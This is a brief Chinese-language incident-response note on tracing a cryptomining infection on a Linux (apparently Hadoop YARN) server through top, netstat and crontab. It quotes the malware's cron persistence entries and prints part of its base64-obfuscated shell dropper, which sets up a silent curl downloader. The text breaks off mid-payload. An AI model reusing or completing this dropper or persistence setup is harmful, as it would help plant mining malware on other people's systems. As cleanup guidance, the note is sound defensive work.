1 用top 命令查询过程信息
pid : 43581 就是挖掘病毒的过程,占用了很多cpu
2 用 netstat -tunp 查询ip 端口 信息
3系统的crontab –l显示调度列表如下:
crontab -u yarn -e
20 * * * * /root/.aliyun.sh >/dev/null 2>&1
48 * * * * /var/lib/hadoop-yarn/.systemd-service.sh > /dev/null 2>&1
每个人可能都不一样。一般可以在定期任务中查询。
4 找到 在这个目录下 sh文件 ,内容如下
echo bmFoRU9VY0NmcTlZcnN0UVdyS2l4MnFjT3lTcDRXcW4KZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDokSE9NRTovYmluOi9zYmluOi91c3IvYmluOi91c3Ivc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4KCmQ9JChncmVwIHg6JChpZCAtdSk6IC9ldGMvcGFzc3dkfGN1dCAtZDogLWY2KQpjPSQoZWNobyAiY3VybCAtNGZzU0xrQS0gLW0yMDAiKQp0PSQoZWNobyAi